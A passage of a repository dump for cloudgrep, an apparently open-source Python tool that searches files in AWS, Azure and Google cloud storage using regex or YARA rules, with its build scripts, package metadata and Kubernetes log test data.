yara_file=args.yara, 74 | file_size=args.file_size, 75 | prefix=args.prefix, 76 | key_contains=args.filename, 77 | from_date=start_date, 78 | end_date=end_date, 79 | hide_filenames=args.hide_filenames, 80 | log_type=args.log_type, 81 | log_format=args.log_format, 82 | log_properties=args.log_properties, 83 | profile=args.profile, 84 | json_output=args.json_output, 85 | ) 86 | 87 | 88 | if __name__ == "__main__": 89 | main() 90 | -------------------------------------------------------------------------------- /cloudgrep/cloud.py: -------------------------------------------------------------------------------- 1 | import boto3 2 | import os 3 | from azure.storage.blob import BlobServiceClient 4 | from azure.identity import DefaultAzureCredential 5 | from azure.core.exceptions import ResourceNotFoundError 6 | from google.cloud import storage # type: ignore 7 | from datetime import datetime 8 | import botocore 9 | import concurrent.futures 10 | import tempfile 11 | from typing import Iterator, Optional, List, Any, Tuple 12 | import logging 13 | from cloudgrep.search import Search 14 | 15 | class Cloud: 16 | def __init__(self) -> None: 17 | self.search = Search() 18 | 19 | def _download_and_search_in_parallel(self, files: List[Any], worker_func: Any) -> int: 20 | """Use ThreadPoolExecutor to download every file 21 | Returns number of matched files""" 22 | total_matched = 0 23 | max_workers = 10 # limit cpu/memory pressure 24 | with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor: 25 | for result in executor.map(worker_func, files): 26 | total_matched += result 27 | return total_matched 28 | 29 | def _download_to_temp(self) -> str: 30 | """Return a temporary filename""" 31 | with tempfile.NamedTemporaryFile(delete=False) as tmp: 32 | tmp.close() 33 | return tmp.name 34 | 35 | def download_from_s3_multithread( 36 | self, 37 | bucket: str, 38 | files: List[str], 39 | query: List[str], 40 | hide_filenames: bool, 41 | yara_rules: Any, 42 | log_format: Optional[str] = None, 43 | log_properties: List[str] = [], 44 | json_output: Optional[bool] = False, 45 | ) -> int: 46 | """Download and search files from AWS S3""" 47 | if log_properties is None: 48 | log_properties = [] 49 | s3 = boto3.client("s3", config=botocore.config.Config(max_pool_connections=64)) 50 | 51 | def _download_search_s3(key: str) -> int: 52 | tmp_name = self._download_to_temp() 53 | try: 54 | logging.info(f"Downloading s3://{bucket}/{key} to {tmp_name}") 55 | s3.download_file(bucket, key, tmp_name) 56 | matched = self.search.search_file( 57 | tmp_name, key, query, hide_filenames, yara_rules, log_format, log_properties, json_output 58 | ) 59 | return 1 if matched else 0 60 | except Exception: 61 | logging.exception(f"Error processing {key}") 62 | return 0 63 | finally: 64 | try: 65 | os.remove(tmp_name) 66 | except OSError: 67 | pass 68 | 69 | return self._download_and_search_in_parallel(files, _download_search_s3) 70 | 71 | def download_from_azure( 72 | self, 73 | account_name: str, 74 | container_name: str, 75 | files: List[str], 76 | query: List[str], 77 | hide_filenames: bool, 78 | yara_rules: Any, 79 | log_format: Optional[str] = None, 80 | log_properties: Optional[List[str]] = None, 81 | json_output: bool = False, 82 | ) -> int: 83 | """Download and search files from Azure Storage""" 84 | if log_properties is None: 85 | log_properties = [] 86 | default_credential = DefaultAzureCredential() 87 | connection_str = f"DefaultEndpointsProtocol=https;AccountName={account_name};EndpointSuffix=core.windows.net" 88 | blob_service_client = BlobServiceClient.from_connection_string(connection_str, credential=default_credential) 89 | container_client = blob_service_client.get_container_client(container_name) 90 | 91 | def _download_search_azure(key: str) -> int: 92 | tmp_name = self._download_to_temp() 93 | try: 94 | logging.info(f"Downloading azure://{account_name}/{container_name}/{key} to {tmp_name}") 95 | blob_client = container_client.get_blob_client(key) 96 | with open(tmp_name, "wb") as out_file: 97 | stream = blob_client.download_blob() 98 | stream.readinto(out_file) 99 | matched = self.search.search_file( 100 | tmp_name, 101 | key, 102 | query, 103 | hide_filenames, 104 | yara_rules, 105 | log_format, 106 | log_properties, 107 | json_output, 108 | account_name, 109 | ) 110 | return 1 if matched else 0 111 | except ResourceNotFoundError: 112 | logging.info(f"File {key} not found in {account_name}/{container_name}") 113 | return 0 114 | except Exception: 115 | logging.exception(f"Error processing {key}") 116 | return 0 117 | finally: 118 | try: 119 | os.remove(tmp_name) 120 | except OSError: 121 | pass 122 | 123 | return self._download_and_search_in_parallel(files, _download_search_azure) 124 | 125 | def download_from_google( 126 | self, 127 | bucket: str, 128 | blobs: List[Tuple[str, Any]], 129 | query: List[str], 130 | hide_filenames: bool, 131 | yara_rules: Any, 132 | log_format: Optional[str] = None, 133 | log_properties: Optional[List[str]] = None, 134 | json_output: bool = False, 135 | ) -> int: 136 | """Download and search files from Google Cloud Storage""" 137 | if log_properties is None: 138 | log_properties = [] 139 | 140 | def _download_and_search_google(item: Tuple[str, Any]) -> int: 141 | key, blob = item 142 | tmp_name = self._download_to_temp() 143 | try: 144 | logging.info(f"Downloading gs://{bucket}/{key} to {tmp_name}") 145 | blob.download_to_filename(tmp_name) 146 | matched = self.search.search_file( 147 | tmp_name, key, query, hide_filenames, yara_rules, log_format, log_properties, json_output 148 | ) 149 | return 1 if matched else 0 150 | except Exception: 151 | logging.exception(f"Error processing {key}") 152 | return 0 153 | finally: 154 | try: 155 | os.remove(tmp_name) 156 | except OSError: 157 | pass 158 | 159 | return self._download_and_search_in_parallel(blobs, _download_and_search_google) 160 | 161 | def get_objects( 162 | self, 163 | bucket: str, 164 | prefix: Optional[str], 165 | key_contains: Optional[str], 166 | from_date: Optional[datetime], 167 | end_date: Optional[datetime], 168 | file_size: int, 169 | max_matches: int = 1000000 # generous default 170 | ) -> Iterator[str]: 171 | """Yield a maximum of max_matches objects that match filter""" 172 | # Reuse the S3 client if already created; otherwise, create one 173 | if not hasattr(self, "s3_client"): 174 | self.s3_client = boto3.client("s3") 175 | paginator = self.s3_client.get_paginator("list_objects_v2") 176 | count = 0 177 | for page in paginator.paginate( 178 | Bucket=bucket, 179 | Prefix=prefix, 180 | PaginationConfig={'PageSize': 1000} 181 | ): 182 | for obj in page.get("Contents", []): 183 | if self.filter_object(obj, key_contains, from_date, end_date, file_size): 184 | yield obj.get("Key") 185 | count += 1 186 | if count >= max_matches: 187 | return 188 | 189 | def get_azure_objects( 190 | self, 191 | account_name: str, 192 | container_name: str, 193 | prefix: Optional[str], 194 | key_contains: Optional[str], 195 | from_date: Optional[datetime], 196 | end_date: Optional[datetime], 197 | file_size: int, 198 | ) -> Iterator[str]: 199 | """Yield Azure blob names that match the filter""" 200 | default_credential = DefaultAzureCredential() 201 | connection_str = f"DefaultEndpointsProtocol=https;AccountName={account_name};EndpointSuffix=core.windows.net" 202 | blob_service_client = BlobServiceClient.from_connection_string(connection_str, credential=default_credential) 203 | container_client = blob_service_client.get_container_client(container_name) 204 | for blob in container_client.list_blobs(name_starts_with=prefix): 205 | if self.filter_object_azure(blob, key_contains, from_date, end_date, file_size): 206 | yield blob.name 207 | 208 | def get_google_objects( 209 | self, 210 | bucket: str, 211 | prefix: Optional[str], 212 | key_contains: Optional[str], 213 | from_date: Optional[datetime], 214 | end_date: Optional[datetime], 215 | ) -> Iterator[Tuple[str, Any]]: 216 | """Yield (blob_name, blob) for blobs in GCP that match filter""" 217 | client = storage.Client() 218 | bucket_gcp = client.get_bucket(bucket) 219 | for blob in bucket_gcp.list_blobs(prefix=prefix): 220 | if self.filter_object_google(blob, key_contains, from_date, end_date): 221 | yield blob.name, blob 222 | 223 | def filter_object( 224 | self, 225 | obj: dict, 226 | key_contains: Optional[str], 227 | from_date: Optional[datetime], 228 | to_date: Optional[datetime], 229 | file_size: int, 230 | ) -> bool: 231 | """Filter an S3 object based on modification date, size, and key substring""" 232 | last_modified = obj.get("LastModified") 233 | if last_modified: 234 | if from_date and last_modified < from_date: 235 | return False 236 | if to_date and last_modified > to_date: 237 | return False 238 | # If size is 0 or greater than file_size, skip 239 | if int(obj.get("Size", 0)) == 0 or int(obj.get("Size", 0)) > file_size: 240 | return False 241 | if key_contains and key_contains not in obj.get("Key", ""): 242 | return False 243 | return True 244 | 245 | def filter_object_azure( 246 | self, 247 | obj: Any, 248 | key_contains: Optional[str], 249 | from_date: Optional[datetime], 250 | to_date: Optional[datetime], 251 | file_size: int, 252 | ) -> bool: 253 | """ 254 | Filter an Azure blob object (or dict) based on modification date, size, and name substring. 255 | """ 256 | if isinstance(obj, dict): 257 | last_modified = obj.get("last_modified") 258 | size = int(obj.get("size", 0)) 259 | name = obj.get("name", "") 260 | else: 261 | last_modified = getattr(obj, "last_modified", None) 262 | size = int(getattr(obj, "size", 0)) 263 | name = getattr(obj, "name", "") 264 | if last_modified: 265 | if from_date and last_modified < from_date: 266 | return False 267 | if to_date and last_modified > to_date: 268 | return False 269 | if size == 0 or size > file_size: 270 | return False 271 | if key_contains and key_contains not in name: 272 | return False 273 | return True 274 | 275 | def filter_object_google( 276 | self, 277 | obj: storage.blob.Blob, 278 | key_contains: Optional[str], 279 | from_date: Optional[datetime], 280 | to_date: Optional[datetime], 281 | ) -> bool: 282 | """Filter a GCP blob based on update time and name substring""" 283 | last_modified = getattr(obj, "updated", None) 284 | if last_modified: 285 | if from_date and last_modified < from_date: 286 | return False 287 | if to_date and last_modified > to_date: 288 | return False 289 | if key_contains and key_contains not in getattr(obj, "name", ""): 290 | return False 291 | return True 292 | -------------------------------------------------------------------------------- /cloudgrep/cloudgrep.py: -------------------------------------------------------------------------------- 1 | import boto3 2 | from datetime import datetime 3 | from typing import Optional, List, Any, Dict 4 | import logging 5 | import yara # type: ignore 6 | 7 | from cloudgrep.cloud import Cloud 8 | 9 | 10 | class CloudGrep: 11 | def __init__(self) -> None: 12 | self.cloud = Cloud() 13 | 14 | def load_queries(self, file_path: str) -> List[str]: 15 | with open(file_path, "r", encoding="utf-8") as f: 16 | return [line.strip() for line in f if line.strip()] 17 | 18 | def list_files( 19 | self, 20 | bucket: Optional[str], 21 | account_name: Optional[str], 22 | container_name: Optional[str], 23 | google_bucket: Optional[str], 24 | prefix: Optional[str] = "", 25 | key_contains: Optional[str] = None, 26 | from_date: Optional[datetime] = None, 27 | end_date: Optional[datetime] = None, 28 | file_size: int = 100_000_000, # 100MB 29 | ) -> Dict[str, List[Any]]: 30 | """ 31 | Returns a dictionary of matching files for each cloud provider. 32 | 33 | The returned dict has the following keys: 34 | - "s3": a list of S3 object keys that match filters 35 | - "azure": a list of Azure blob names that match filters 36 | - "gcs": a list of tuples (blob name, blob) for Google Cloud Storage that match filters 37 | """ 38 | files = {} 39 | if bucket: 40 | files["s3"] = list(self.cloud.get_objects(bucket, prefix, key_contains, from_date, end_date, file_size)) 41 | if account_name and container_name: 42 | files["azure"] = list( 43 | self.cloud.get_azure_objects( 44 | account_name, container_name, prefix, key_contains, from_date, end_date, file_size 45 | ) 46 | ) 47 | if google_bucket: 48 | files["gcs"] = [blob[0] for blob in self.cloud.get_google_objects(google_bucket, prefix, key_contains, from_date, end_date)] 49 | return files 50 | 51 | def search( 52 | self, 53 | bucket: Optional[str], 54 | account_name: Optional[str], 55 | container_name: Optional[str], 56 | google_bucket: Optional[str], 57 | query: Optional[List[str]], 58 | file: Optional[str], 59 | yara_file: Optional[str], 60 | file_size: int, 61 | prefix: Optional[str] = "", 62 | key_contains: Optional[str] = None, 63 | from_date: Optional[datetime] = None, 64 | end_date: Optional[datetime] = None, 65 | hide_filenames: bool = False, 66 | log_type: Optional[str] = None, 67 | log_format: Optional[str] = None, 68 | log_properties: Optional[List[str]] = None, 69 | profile: Optional[str] = None, 70 | json_output: bool = False, 71 | files: Optional[Dict[str, List[Any]]] = None, 72 | ) -> None: 73 | """ 74 | Searches the contents of files matching the given queries. 75 | 76 | If the optional `files` parameter is provided (a dict with keys such as "s3", "azure", or "gcs") 77 | then the search will use those file lists instead of applying the filters again. 78 | """ 79 | if not query and file: 80 | logging.debug(f"Loading queries from {file}") 81 | query = self.load_queries(file) 82 | if not query: 83 | logging.error("No query provided. Exiting.") 84 | return 85 | 86 | yara_rules = None 87 | if yara_file: 88 | logging.debug(f"Compiling yara rules from {yara_file}") 89 | yara_rules = yara.compile(filepath=yara_file) 90 | 91 | if profile: 92 | boto3.setup_default_session(profile_name=profile) 93 | 94 | if log_type: 95 | if log_type.lower() == "cloudtrail": 96 | log_format = "json" 97 | log_properties = ["Records"] 98 | elif log_type.lower() == "azure": 99 | log_format = "json" 100 | log_properties = ["data"] 101 | else: 102 | logging.error(f"Invalid log_type: {log_type}") 103 | return 104 | if log_properties is None: 105 | log_properties = [] 106 | 107 | if bucket: 108 | if files and "s3" in files: 109 | matching_keys = files["s3"] 110 | else: 111 | matching_keys = list( 112 | self.cloud.get_objects(bucket, prefix, key_contains, from_date, end_date, file_size) 113 | ) 114 | s3_client = boto3.client("s3") 115 | region = s3_client.get_bucket_location(Bucket=bucket).get("LocationConstraint", "unknown") 116 | logging.warning(f"Bucket region: {region}. (Search from the same region to avoid egress charges.)") 117 | logging.warning(f"Searching {len(matching_keys)} files in {bucket} for {query}...") 118 | self.cloud.download_from_s3_multithread( 119 | bucket, matching_keys, query, hide_filenames, yara_rules, log_format, log_properties, json_output 120 | ) 121 | 122 | if account_name and container_name: 123 | if files and "azure" in files: 124 | matching_keys = files["azure"] 125 | else: 126 | matching_keys = list( 127 | self.cloud.get_azure_objects( 128 | account_name, container_name, prefix, key_contains, from_date, end_date, file_size 129 | ) 130 | ) 131 | logging.info(f"Searching {len(matching_keys)} files in {account_name}/{container_name} for {query}...") 132 | self.cloud.download_from_azure( 133 | account_name, 134 | container_name, 135 | matching_keys, 136 | query, 137 | hide_filenames, 138 | yara_rules, 139 | log_format, 140 | log_properties, 141 | json_output, 142 | ) 143 | 144 | if google_bucket: 145 | if files and "gcs" in files: 146 | matching_blobs = files["gcs"] 147 | else: 148 | matching_blobs = list( 149 | self.cloud.get_google_objects(google_bucket, prefix, key_contains, from_date, end_date) 150 | ) 151 | logging.info(f"Searching {len(matching_blobs)} files in {google_bucket} for {query}...") 152 | self.cloud.download_from_google( 153 | google_bucket, 154 | matching_blobs, 155 | query, 156 | hide_filenames, 157 | yara_rules, 158 | log_format, 159 | log_properties, 160 | json_output, 161 | ) 162 | -------------------------------------------------------------------------------- /cloudgrep/queries.txt: -------------------------------------------------------------------------------- 1 | query1 2 | query2 3 | query3 -------------------------------------------------------------------------------- /cloudgrep/search.py: -------------------------------------------------------------------------------- 1 | import re 2 | from typing import Optional, List, Any, Iterator, Iterable 3 | import logging 4 | import gzip 5 | import zipfile 6 | import json 7 | import csv 8 | import io 9 | 10 | class Search: 11 | def get_all_strings_line(self, file_path: str) -> Iterator[str]: 12 | """Yield lines from a file without loading into memory""" 13 | with open(file_path, "r", encoding="utf-8", errors="ignore") as f: 14 | for line in f: 15 | yield line 16 | 17 | def print_match(self, match_info: dict, hide_filenames: bool, json_output: Optional[bool]) -> None: 18 | output = match_info.copy() 19 | if hide_filenames: 20 | output.pop("key_name", None) 21 | if json_output: 22 | try: 23 | print(json.dumps(output)) 24 | except TypeError: 25 | print(str(output)) 26 | else: 27 | line = output.get("line", "") 28 | if "match_rule" in output: 29 | line = f"{output['match_rule']}: {output.get('match_strings', '')}" 30 | print(f"{output.get('key_name', '')}: {line}" if not hide_filenames else line) 31 | 32 | def parse_logs(self, line: str, log_format: Optional[str]) -> Any: 33 | if log_format == "json": 34 | try: 35 | return json.loads(line) 36 | except json.JSONDecodeError as e: 37 | logging.error(f"JSON decode error in line: {line} ({e})") 38 | elif log_format == "csv": 39 | try: 40 | return list(csv.DictReader([line])) 41 | except csv.Error as e: 42 | logging.error(f"CSV parse error in line: {line} ({e})") 43 | elif log_format: 44 | logging.error(f"Unsupported log format: {log_format}") 45 | return None 46 | 47 | def extract_log_entries(self, parsed: Any, log_properties: List[str]) -> List[Any]: 48 | if log_properties and isinstance(parsed, dict): 49 | for prop in log_properties: 50 | parsed = parsed.get(prop, None) 51 | if parsed is None: 52 | break 53 | if isinstance(parsed, list): 54 | return parsed 55 | elif parsed is not None: 56 | return [parsed] 57 | return [] 58 | 59 | def search_logs( 60 | self, 61 | line: str, 62 | key_name: str, 63 | search: str, 64 | hide_filenames: bool, 65 | log_format: Optional[str] = None, 66 | log_properties: List[str] = [], 67 | json_output: Optional[bool] = False, 68 | ) -> None: 69 | """Search log records in parsed logs""" 70 | parsed = self.parse_logs(line, log_format) 71 | if not parsed: 72 | return 73 | for entry in self.extract_log_entries(parsed, log_properties): 74 | entry_str = json.dumps(entry) 75 | if re.search(search, entry_str): 76 | self.print_match({"key_name": key_name, "query": search, "line": entry}, hide_filenames, json_output) 77 | 78 | def search_line( 79 | self, 80 | key_name: str, 81 | compiled_patterns: List[re.Pattern], 82 | hide_filenames: bool, 83 | line: str, 84 | log_format: Optional[str], 85 | log_properties: List[str] = [], 86 | json_output: Optional[bool] = False, 87 | ) -> bool: 88 | """Regex search of the line""" 89 | found = False 90 | for regex in compiled_patterns: 91 | if regex.search(line): 92 | if log_format: 93 | self.search_logs(line, key_name, regex.pattern, hide_filenames, log_format, log_properties, json_output) 94 | else: 95 | self.print_match( 96 | {"key_name": key_name, "query": regex.pattern, "line": line}, hide_filenames, json_output 97 | ) 98 | found = True 99 | return found 100 | 101 | def yara_scan_file( 102 | self, file_name: str, key_name: str, hide_filenames: bool, yara_rules: Any, json_output: Optional[bool] = False 103 | ) -> bool: 104 | """Run Yara scan on a file""" 105 | matches = yara_rules.match(file_name) 106 | for match in matches: 107 | self.print_match( 108 | {"key_name": key_name, "match_rule": match.rule, "match_strings": match.strings}, 109 | hide_filenames, 110 | json_output, 111 | ) 112 | return bool(matches) 113 | 114 | def search_file( 115 | self, 116 | file_name: str, 117 | key_name: str, 118 | patterns: List[str], 119 | hide_filenames: bool, 120 | yara_rules: Any, 121 | log_format: Optional[str] = None, 122 | log_properties: List[str] = [], 123 | json_output: Optional[bool] = False, 124 | account_name: Optional[str] = None, 125 | ) -> bool: 126 | """Regex search of the file line by line""" 127 | logging.info(f"Searching {file_name} for patterns: {patterns}") 128 | if yara_rules: 129 | return self.yara_scan_file(file_name, key_name, hide_filenames, yara_rules, json_output) 130 | 131 | compiled_patterns = [re.compile(p) for p in patterns] 132 | 133 | def process_lines(lines: Iterable[str]) -> bool: 134 | return any( 135 | self.search_line(key_name, compiled_patterns, hide_filenames, line, log_format, log_properties, json_output) 136 | for line in lines 137 | ) 138 | 139 | if file_name.endswith(".gz"): 140 | try: 141 | with gzip.open(file_name, "rt", encoding="utf-8", errors="ignore") as f: 142 | if account_name: 143 | data = json.load(f) 144 | return process_lines(data) 145 | else: 146 | return process_lines(f) 147 | except Exception: 148 | logging.exception(f"Error processing gzip file: {file_name}") 149 | return False 150 | elif file_name.endswith(".zip"): 151 | matched_any = False 152 | try: 153 | with zipfile.ZipFile(file_name, "r") as zf: 154 | for zip_info in zf.infolist(): 155 | if zip_info.is_dir(): 156 | continue 157 | with zf.open(zip_info) as file_obj: 158 | # Wrap the binary stream as text 159 | with io.TextIOWrapper(file_obj, encoding="utf-8", errors="ignore") as f: 160 | if account_name: 161 | try: 162 | data = json.load(f) 163 | if process_lines(data): 164 | matched_any = True 165 | except Exception: 166 | logging.exception(f"Error processing json in zip member: {zip_info.filename}") 167 | else: 168 | if process_lines(f): 169 | matched_any = True 170 | return matched_any 171 | except Exception: 172 | logging.exception(f"Error processing zip file: {file_name}") 173 | return False 174 | else: 175 | try: 176 | return process_lines(self.get_all_strings_line(file_name)) 177 | except Exception: 178 | logging.exception(f"Error processing file: {file_name}") 179 | return False 180 | -------------------------------------------------------------------------------- /readme/Diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/readme/Diagram.png -------------------------------------------------------------------------------- /release/generate_linux_binary.sh: -------------------------------------------------------------------------------- 1 | # Run with ./release/generate_linux_binary.sh 2 | pwd 3 | ls 4 | pip3 install -r requirements.txt 5 | pyinstaller --onefile --name cloudgrep --clean ./cloudgrep/__main__.py 6 | -------------------------------------------------------------------------------- /release/generate_osx_binary.sh: -------------------------------------------------------------------------------- 1 | # Tested with python 3.10 and PyInstaller 5.4.1 2 | # Run with ./release/generate_linux_binary.sh 3 | pwd 4 | ls 5 | pip3 install -r requirements.txt 6 | pyinstaller --onefile --clean --target-arch universal2 ./cloudgrep/cloudgrep.py 7 | -------------------------------------------------------------------------------- /release/generate_windows_binary.bat: -------------------------------------------------------------------------------- 1 | dir 2 | python3 -m pip install -r ../requirements.txt 3 | python3 -m PyInstaller --name cloudgrep --onefile ../cloudgrep/__main__.py 4 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | botocore>=1.36.9 2 | boto3>=1.36.9 3 | boto3-stubs>=1.36.9 4 | python-dateutil==2.8.1 5 | types-python-dateutil==2.8.13 6 | pytest==7.2.0 7 | moto==5.0.27 8 | timeout-decorator==0.5.0 9 | black==24.3.0 10 | pip-audit==2.6.1 11 | azure-storage-blob==12.18.3 12 | azure-core==1.29.4 13 | azure-identity==1.16.1 14 | google-cloud-storage==2.12.0 15 | setuptools==70.0.0 16 | yara-python-wheel==4.4.0 17 | -------------------------------------------------------------------------------- /setup.cfg: -------------------------------------------------------------------------------- 1 | [metadata] 2 | name = cloudgrep 3 | description = cloudgrep: searches cloud storage. 4 | version = 1.0.5 5 | long_description = file: README.md 6 | long_description_content_type = text/x-rst 7 | author = Cado Security and Contributors 8 | license = Apache License 9 | license_files = LICENSE 10 | classifiers = 11 | Intended Audience :: Developers 12 | Operating System :: POSIX 13 | Programming Language :: Python :: 3 14 | Programming Language :: Python :: 3 :: Only 15 | Programming Language :: Python :: 3.8 16 | Programming Language :: Python :: 3.9 17 | Programming Language :: Python :: 3.10 18 | Programming Language :: Python :: 3.11 19 | Programming Language :: Python :: 3.12 20 | Topic :: Software Development :: Libraries 21 | Topic :: Utilities 22 | 23 | [options] 24 | packages = 25 | cloudgrep 26 | install_requires = 27 | botocore==1.24.46 28 | boto3==1.21.24 29 | boto3-stubs==1.20.49 30 | python-dateutil==2.8.1 31 | types-python-dateutil==2.8.13 32 | pytest==7.2.0 33 | moto==4.2.2 34 | timeout-decorator==0.5.0 35 | black==23.9.1 36 | pip-audit==2.6.1 37 | azure-storage-blob==12.18.3 38 | azure-core==1.29.4 39 | azure-identity==1.14.1 40 | google-cloud-storage==2.12.0 41 | python_requires = >=3.8 42 | zip_safe = ye 43 | 44 | [options.entry_points] 45 | console_scripts = 46 | cloudgrep=cloudgrep.__main__:main 47 | 48 | [options.extras_require] 49 | testing = 50 | pytest==7.2.0 51 | 52 | 53 | [devpi:upload] 54 | formats = sdist.tgz,bdist_wheel 55 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | # read the contents of your README file 2 | from pathlib import Path 3 | 4 | from setuptools import find_packages, setup # type: ignore 5 | 6 | this_directory = Path(__file__).parent 7 | long_description = (this_directory / "README.md").read_text() 8 | 9 | 10 | VERSION = "1.0.5" 11 | 12 | setup( 13 | name="cloudgrep", 14 | version=VERSION, 15 | description="cloudgrep searches cloud storage", 16 | long_description=long_description, 17 | long_description_content_type="text/markdown", 18 | author="Cado Security", 19 | author_email="cloudgrep@cadosecurity.com", 20 | url="https://github.com/cado-security/cloudgrep", 21 | download_url="https://github.com/cado-security/cloudgrep/archive/refs/heads/main.zip", 22 | py_modules=["cloudgrep"], 23 | install_requires=[ 24 | "botocore", 25 | "boto3", 26 | "python-dateutil", 27 | "azure-storage-blob", 28 | "azure-core", 29 | "azure-identity", 30 | "google-cloud-storage", 31 | "yara-python-wheel", 32 | ], 33 | packages=find_packages(), 34 | ) 35 | -------------------------------------------------------------------------------- /tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/tests/__init__.py -------------------------------------------------------------------------------- /tests/data/000000: -------------------------------------------------------------------------------- 1 | 2021-07-10T20:27:23.000Z I0710 20:27:23.782909 1 flags.go:59] FLAG: --add-dir-header="false" 2 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783038 1 flags.go:59] FLAG: --address="127.0.0.1" 3 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783055 1 flags.go:59] FLAG: --allocate-node-cidrs="false" 4 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783062 1 flags.go:59] FLAG: --allow-untagged-cloud="false" 5 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783066 1 flags.go:59] FLAG: --alsologtostderr="false" 6 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783070 1 flags.go:59] FLAG: --attach-detach-reconcile-sync-period="1m0s" 7 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783075 1 flags.go:59] FLAG: --authentication-kubeconfig="" 8 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783080 1 flags.go:59] FLAG: --authentication-skip-lookup="false" 9 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783084 1 flags.go:59] FLAG: --authentication-token-webhook-cache-ttl="10s" 10 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783087 1 flags.go:59] FLAG: --authentication-tolerate-lookup-failure="false" 11 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783091 1 flags.go:59] FLAG: --authorization-always-allow-paths="[/healthz]" 12 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783104 1 flags.go:59] FLAG: --authorization-kubeconfig="" 13 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783108 1 flags.go:59] FLAG: --authorization-webhook-cache-authorized-ttl="10s" 14 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783112 1 flags.go:59] FLAG: --authorization-webhook-cache-unauthorized-ttl="10s" 15 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783116 1 flags.go:59] FLAG: --bind-address="0.0.0.0" 16 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783121 1 flags.go:59] FLAG: --cert-dir="" 17 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783124 1 flags.go:59] FLAG: --cidr-allocator-type="RangeAllocator" 18 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783128 1 flags.go:59] FLAG: --client-ca-file="" 19 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783131 1 flags.go:59] FLAG: --cloud-config="/var/lib/kubernetes/aws.config" 20 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783136 1 flags.go:59] FLAG: --cloud-provider="aws" 21 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783139 1 flags.go:59] FLAG: --cloud-provider-gce-lb-src-cidrs="130.211.0.0/22,209.85.152.0/22,209.85.204.0/22,35.191.0.0/16" 22 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783156 1 flags.go:59] FLAG: --cluster-cidr="10.200.0.0/16" 23 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783162 1 flags.go:59] FLAG: --cluster-name="kubernetes" 24 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783166 1 flags.go:59] FLAG: --cluster-signing-cert-file="" 25 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783170 1 flags.go:59] FLAG: --cluster-signing-duration="8760h0m0s" 26 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783174 1 flags.go:59] FLAG: --cluster-signing-key-file="" 27 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783178 1 flags.go:59] FLAG: --cluster-signing-kube-apiserver-client-cert-file="" 28 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783181 1 flags.go:59] FLAG: --cluster-signing-kube-apiserver-client-key-file="" 29 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783185 1 flags.go:59] FLAG: --cluster-signing-kubelet-client-cert-file="" 30 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783188 1 flags.go:59] FLAG: --cluster-signing-kubelet-client-key-file="" 31 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783191 1 flags.go:59] FLAG: --cluster-signing-kubelet-serving-cert-file="" 32 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783195 1 flags.go:59] FLAG: --cluster-signing-kubelet-serving-key-file="" 33 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783198 1 flags.go:59] FLAG: --cluster-signing-legacy-unknown-cert-file="" 34 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783201 1 flags.go:59] FLAG: --cluster-signing-legacy-unknown-key-file="" 35 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783205 1 flags.go:59] FLAG: --concurrent-deployment-syncs="5" 36 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783211 1 flags.go:59] FLAG: --concurrent-endpoint-syncs="5" 37 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783215 1 flags.go:59] FLAG: --concurrent-gc-syncs="20" 38 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783219 1 flags.go:59] FLAG: --concurrent-namespace-syncs="10" 39 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783222 1 flags.go:59] FLAG: --concurrent-replicaset-syncs="5" 40 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783226 1 flags.go:59] FLAG: --concurrent-resource-quota-syncs="5" 41 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783229 1 flags.go:59] FLAG: --concurrent-service-endpoint-syncs="5" 42 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783237 1 flags.go:59] FLAG: --concurrent-service-syncs="1" 43 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783241 1 flags.go:59] FLAG: --concurrent-serviceaccount-token-syncs="5" 44 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783244 1 flags.go:59] FLAG: --concurrent-statefulset-syncs="5" 45 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783248 1 flags.go:59] FLAG: --concurrent-ttl-after-finished-syncs="5" 46 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783251 1 flags.go:59] FLAG: --concurrent_rc_syncs="5" 47 | 2021-07-10T20:27:23.000Z I0710 